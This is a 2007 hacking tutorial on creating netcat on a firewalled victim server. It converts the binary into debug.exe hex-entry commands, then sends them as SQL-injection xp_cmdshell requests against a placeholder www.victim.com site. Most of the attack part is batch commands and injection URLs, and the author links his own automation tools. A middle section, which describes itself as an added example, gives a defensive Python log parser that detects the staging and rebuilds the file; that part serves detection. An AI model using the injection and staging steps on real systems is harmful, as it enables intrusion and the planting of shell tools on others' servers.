=============================================================================
Creating files When it's not possible to Transfer them
by SuRGeoN
=============================================================================
14/07/2007
Sometimes hackers want to transfer files to the victim's server but are blocked by a firewall.
In this scenario they will try to create the file on the server rather than upload it. The
idea has two steps:
=====================================================
1) Converting the file properly for the Windows debugger
=====================================================
The Windows debugger (debug.exe) can create a binary file (here named z9.dll) of up to 64 KB by
parsing parameters such as hex values and the addresses at which we want to write the data. So we
can "send" only text to the victim and then convert it to binary with the Windows debugger. For
example, we want to create netcat (nc.exe) on the victim's server.
We have to create a text file formatted properly for the Windows debugger...
CODE
n z9.dll
e 0100
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 ...
e 0180
50 45 00 00 4c 01 04 00 b9 8e ae 34 00 00 00 00 00 ...
e 0200
00 20 01
...
e e800
47 65 74 4e 75 6d 62 65 72 4f 66 43 6f 6e 73 6f 6c ...
e e880
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...
e e900
r cx
e800
w
q
This is an example of how we can create netcat (nc.exe) with the debugger. Above we can see the
commands that tell the debugger to create z9.dll with the hex data of netcat. So we can create
a batch script that writes all these commands to a file and then feeds them to the debugger.
An example batch script (for nc.exe)...
CODE
echo off && echo n z9.dll >z9
echo e 0100 >> z9 && echo 4d 5a 90 00 03 00 00 ... >>z9
echo e 0180 >> z9 && echo 50 45 00 00 4c 01 04 ... >>z9
echo e 0200 >> z9 && echo 00 20 01 00 3c 00 00 ... >>z9
...
echo e e800 >> z9 && echo 47 65 74 4e 75 6d 62 ... >>z9
echo e e880 >> z9 && echo 00 00 00 00 00 00 00 ... >>z9
echo e e900 >> z9 && echo >>z9
echo r cx >>z9 && echo e800 >>z9 && echo w >>z9 &&
echo q >>z9 && debug<z9 && copy z9.dll z91.tmp &&
del z9.dll && del z9 && copy z91.tmp nc.exe
It writes the data (the debugger commands with the hex values of netcat) to a file named z9
and then feeds it to the debugger (debug<z9). The result is a file z9.dll, and if we rename it
to nc.exe we have the original nc.exe.
For this scenario I created a tool, srgn-file2text, that automates these steps. You give it
a file as input and you get back the text file formatted properly for the Windows debugger. It
supports files larger than 64 KB.
Example with srgn-file2text in this scenario: "srgn-file2text.exe nc.exe nc.bat"
download -> http://surgeon.gotdns.org/show.php?cid=2&aid=38
More info on the Windows debugger
---------------------------------------------------------
http://www.geocities.com/thestarman3/asm/debug/debug2.htm
http://www.datastronghold.com/archive/t14768.html
http://old.bsrf.org.uk/tutorials/debug.html
---------------------------------------------------------
===================================================
2) Pasting the text line by line to the victim's server
===================================================
So we have the text file ready, but how can we use it to create the original file on the victim's server?
We suppose that we already have access to execute commands on the server but cannot transfer files
(no tftp, ftp, wget, etc.). So we can create the file by pasting the above text line by line to the
victim's server. To understand the idea better, suppose we can execute commands with the help of
xp_cmdshell. Example...
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell '<command>';--
So if we send the following requests we will create netcat (nc.exe) on the server...
CODE
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo off && echo n z9.dll >z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e 0100 >> z9 && echo 4d ... >>z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e 0180 >> z9 && echo 50 ... >>z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e 0200 >> z9 && echo 00 ... >>z9';--
...
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e e800 >> z9 && echo 47 ... >>z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e e880 >> z9 && echo 00 ... >>z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e e900 >> z9 && echo >>z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo r cx >>z9 && echo e800 >>z9 && echo w >>z9
&& echo q >>z9 && debug<z9 && copy z9.dll z91.tmp
&& del z9.dll && del z9 && copy z91.tmp nc.exe ';--
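From the defender's side, the useful property of this technique is that every line of the staged binary passes through the web server as an xp_cmdshell payload, so the request log alone is enough both to detect the staging and to rebuild the file that debug.exe wrote. The script below is an added example for this section, not SuRGeoN's code or one of his tools. It assumes the request shape shown above (one xp_cmdshell payload per request, each appending echo lines to a staging file that is then piped into debug), assumes the log text has already been URL-decoded, and implements only the debug.exe commands the post uses (n, e, r cx, w, q). The log lines in SAMPLE_LOG are constructed and stage a 16-byte MZ fragment, not netcat.

```python
"""Rebuild a file that was staged through debug.exe from web-server log lines.

Added example (not SuRGeoN's code or tools). Assumes one xp_cmdshell payload
per request, URL-decoded log text, and the debug command subset the post uses.
SAMPLE_LOG is constructed, not real traffic.
"""
import re
from typing import List, Optional, Tuple

# Payload between xp_cmdshell '...';-- in a logged request line.
XP_CMDSHELL_RE = re.compile(r"xp_cmdshell\s+'(?P<cmd>.*?)'\s*;--",
                            re.IGNORECASE | re.DOTALL)
# One `echo TEXT >>file` fragment; TEXT stops at the redirect or at "&&".
ECHO_RE = re.compile(r"echo\s+(?P<text>[^&>]*?)\s*>>?\s*\S+", re.IGNORECASE)

# Constructed sample log: stages a 16-byte MZ fragment through z9 -> z9.dll.
SAMPLE_LOG = [
    "GET /news.asp?id=1;exec master..xp_cmdshell 'echo off && echo n z9.dll >z9';-- 200",
    "GET /news.asp?id=1;exec master..xp_cmdshell 'echo e 0100 >> z9 && echo 4d 5a 90 00 03 00 00 00 >>z9';-- 200",
    "GET /news.asp?id=1;exec master..xp_cmdshell 'echo e 0108 >> z9 && echo 04 00 00 00 ff ff 00 00 >>z9';-- 200",
    "GET /news.asp?id=1;exec master..xp_cmdshell 'echo e 0110 >> z9 && echo >>z9';-- 200",
    "GET /news.asp?id=1;exec master..xp_cmdshell 'echo r cx >>z9 && echo 10 >>z9 && echo w >>z9 "
    "&& echo q >>z9 && debug<z9 && copy z9.dll nc.exe';-- 200",
    "GET /news.asp?id=2 200",  # unrelated request, must be ignored
]


def extract_script_lines(log_lines: List[str]) -> List[str]:
    """Return, in order, the lines that the echo commands append to the staging file."""
    script = []
    for line in log_lines:
        payload = XP_CMDSHELL_RE.search(line)
        if not payload:
            continue
        for echo in ECHO_RE.finditer(payload.group("cmd")):
            script.append(echo.group("text").strip())
    return script


def _poke(mem: bytearray, addr: int, data: bytes) -> None:
    """Write data at addr, clipped to the 64 KB segment so the buffer never grows."""
    data = data[:max(0, 0x10000 - addr)]
    mem[addr:addr + len(data)] = data


def reconstruct(script: List[str]) -> Tuple[Optional[str], Optional[bytes]]:
    """Interpret the debug.exe commands the post uses; return (file name, bytes `w` writes).
      n NAME        name the output file
      e ADDR [B..]  enter bytes at hex offset ADDR; with no bytes on the line the
                    next line supplies them (debug's interactive entry mode)
      r cx / VAL    the line after `r cx` is the new CX (byte count for `w`)
      w             write CX bytes starting at offset 0x100 to NAME
      q             stop
    Unrecognised lines are skipped."""
    mem = bytearray(0x10000)            # debug works inside a single 64 KB segment
    name, cx, written = None, 0, None
    pending_reg = None                  # register awaiting its value line
    pending_enter = None                # address awaiting its byte line
    for line in script:
        parts = line.split()
        if pending_reg is not None:
            if pending_reg == "cx" and parts:
                try:
                    cx = int(parts[0], 16)
                except ValueError:
                    pass
            pending_reg = None
            continue
        if pending_enter is not None:
            addr, pending_enter = pending_enter, None
            try:
                _poke(mem, addr, bytes(int(b, 16) for b in parts))
            except ValueError:          # blank line or "ECHO is off.": nothing entered
                pass
            continue
        if not parts:
            continue
        cmd = parts[0].lower()
        try:
            if cmd == "n" and len(parts) > 1:
                name = parts[1]
            elif cmd == "e" and len(parts) == 2:
                pending_enter = int(parts[1], 16)
            elif cmd == "e" and len(parts) > 2:
                _poke(mem, int(parts[1], 16), bytes(int(b, 16) for b in parts[2:]))
            elif cmd == "r" and len(parts) > 1:
                pending_reg = parts[1].lower()
            elif cmd == "w":
                written = bytes(mem[0x100:0x100 + cx])
            elif cmd == "q":
                break
        except ValueError:              # malformed hex (e.g. "..."): skip the line
            continue
    return name, written


def looks_like_pe(data: Optional[bytes]) -> bool:
    """True when the rebuilt bytes carry the MZ header, i.e. an executable was staged."""
    return data is not None and data[:2] == b"MZ"


def is_debug_staging(log_lines: List[str]) -> bool:
    """Triage signal: payloads that append `e <hex>` lines and pipe a file into debug."""
    cmds = [m.group("cmd") for line in log_lines for m in XP_CMDSHELL_RE.finditer(line)]
    enters = any(re.search(r"\becho\s+e\s+[0-9a-f]{1,4}\b", c, re.I) for c in cmds)
    runs_debug = any(re.search(r"\bdebug\s*<", c, re.I) for c in cmds)
    return enters and runs_debug


if __name__ == "__main__":
    name, data = reconstruct(extract_script_lines(SAMPLE_LOG))
    print(f"staging detected: {is_debug_staging(SAMPLE_LOG)}")
    print(f"{name}: {len(data or b'')} bytes, PE header: {looks_like_pe(data)}")
```

The rebuilt bytes can be hashed and compared against known tools, and is_debug_staging() is cheap enough to run over a whole IIS log; in practice the payloads arrive URL-encoded, so decode each request line before feeding it to these functions.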
For this scenario I created a tool, srgn-httprequests, that automates these steps. You give it
the START of the URL (text), the MIDDLE of the URL (a file) and the END of the URL (text).
Example with srgn-httprequests: fill the textboxes with these:
START -> http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell '
MIDDLE -> c:\nc.bat
END -> ';--
download -> http://surgeon.gotdns.org/show.php?cid=2&aid=39
=============================================================================
[EOF]